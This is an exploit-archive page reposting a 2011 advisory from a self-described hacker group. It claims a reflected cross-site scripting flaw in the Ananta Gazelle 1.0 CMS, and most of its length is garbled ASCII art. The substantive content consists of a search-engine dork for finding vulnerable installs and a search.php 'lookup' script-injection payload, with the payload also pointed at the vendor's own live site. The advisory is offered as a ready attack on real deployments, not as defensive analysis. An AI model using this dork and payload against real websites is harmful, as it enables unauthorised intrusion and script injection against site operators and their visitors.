Home / exploits

PDF

Ananta Gazelle 1.0 Cross Site Scripting

Posted on 04 April 2011

Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´kurd-teamÂ´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´kurdteam.orgÂ´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´ Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â´Â´Â´ Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´ Â´Â´Â¶Â¶Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â¶Â¶Â´Â´ Â´Â¶Â¶Â¶Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â¶Â¶Â¶Â´ Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶ Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶ Â´Â´Â¶Â¶Â¶Â¶Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â´Â¶Â¶Â¶Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â¶Â¶Â¶Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â¶Â¶Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â´Â¶Â¶Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â¶Â¶Â´Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â´Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´ Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´ Â´Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´ Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´ =========================================================== Ananta_Gazelle1.0 Cross Site Scripting Vulnerability ----------------------------------------------------------- foun by :kurdish hackers team group : kurd-team contact : pshela@yahoo.com site : kurdteam.org ----------------------------------------------------------- ------------------------script----------------------------- ----------------------------------------------------------- script: Ananta_Gazelle1.0 download: http://www.anantasoft.com ----------------------------------------------------------- Exploit: -------- dork: "CMS: Ananta Gazelle" Exmple: ------- /search.php?lookup=<script>alert(888)</script> To experience: http://www.anantasoft.com/search.php?lookup=<script>alert(888)</script> ----------------------------------------------------------- Zryan_kurd ,root-SyS -----------------------------------------------------------

Malware :

Last 20

Exploits :

Last 20